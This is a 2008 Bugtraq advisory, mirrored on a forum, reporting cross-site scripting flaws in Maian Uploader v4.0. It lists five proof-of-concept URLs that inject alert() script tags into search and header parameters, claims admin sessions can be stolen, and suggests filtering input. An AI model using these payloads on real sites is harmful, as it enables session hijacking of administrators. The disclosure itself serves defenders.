Maian Uploader v4.0 XSS Vulnerabilities

看板Bugtraq作者時間17年前 (2008/05/06 20:06), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
---------------------------------------------------------------- Script : Maian Uploader v4.0 Type : XSS Vulnerabilities ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH ---------------------------------------------------------------- Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM ---------------------------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ---------------------------------------------------------------- Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html ---------------------------------------------------------------- XSS 1 : alert('xss')" rel="nofollow">http://localhost/maian/upload/admin/index.php?cmd=search&process=1&keywords="<script>alert('xss')</script> XSS 2 : alert('xss')" rel="nofollow">http://Example/admin/inc/header.php?msg_charset="<script>alert('xss')</script> XSS 3 : alert('xss')" rel="nofollow">http://Example/admin/inc/header.php?msg_header9="<script>alert('xss')</script> XSS 4 : alert('xss')" rel="nofollow">http://Example/admin/inc/header.php?msg_header9="<script>alert('xss')</script> XSS 4 : alert('xss')" rel="nofollow">http://Example/index.php?cmd=search&keywords="<script>alert('xss')</script> You Can Get Admin Session With This Vuln .... ---------------------------------------------------------------- Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ....... ---------------------------------------------------------------- TNx : God...... Khashayar Fereidani Email : irancrash[at]gmail[dot]com ----------------------------------------------------------------
文章代碼(AID): #1884d600 (Bugtraq)